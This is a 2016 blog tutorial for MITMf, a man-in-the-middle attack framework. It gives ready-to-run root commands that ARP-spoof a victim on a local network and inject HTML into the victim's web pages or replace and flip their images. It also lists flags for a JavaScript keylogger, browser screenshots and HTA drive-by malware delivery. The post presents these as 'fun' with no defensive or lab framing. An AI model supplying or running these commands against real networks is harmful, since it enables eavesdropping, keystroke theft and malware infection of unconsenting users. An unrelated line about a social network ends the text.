Sunday, October 23, 2016

Man-In-The-Middle Attack Framework: MITMf

MITMf is a Framework for Man-In-The-Middle attacks. MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
MITMf is available with Kali Linux. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at https://github.com/byt3bl33d3r/MITMf/wiki/Installation
MITMf is a simple to use command line attack tool. This article presents some example which can be a real fun ;). Use it at your own risk.

Inject html page in victims browser

Create a index.html in your root folder and ...
root@debian:~# cd /usr/share/mitmf/  
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html  
The above example will injects this index.html in the victims(192.168.1.9 in this example) browser whenever he is viewing some http(not https) website.
  • -i is for the interface (wlan0 in this example)
  • --spoof Loads plugin 'Spoof'
  • --arp Redirect traffic using ARP spoofing
  • --gateway GATEWAYSpecify the gateway IP on your network.
  • --targets TARGETS Specify host/s to poison [if ommited will default to subnet]
  • --inject Load plugin 'Inject' to inject index.html
Note: arp spoof attack intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.

Make images look upside-down

This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.
root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet

Replace images (Image Randomiser)

Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (/root/Pictures/ in this example).
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/  

Other Plugins

There are many other plugins available with MITMf you can play with.
  • To take a screenshot of victims browser
ScreenShotter:  
Uses HTML5 Canvas to render an accurate screenshot of a clients browser

--screen Load plugin 'ScreenShotter'
--interval SECONDS Interval at which screenshots will be taken (default 10 seconds)
  • Injects a javascript keylogger into victims webpages
--jskeylogger Load plugin 'JSKeylogger'
  • Performs HTA drive-by attacks on victim
--hta Load plugin 'HTA Drive-By'
--text TEXT Text to display on notification bar
--hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] 
 
http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/ 

Planet Cortex (Eter9 Social Network ) AI intel portuguese eng

  https://www.eter9.com/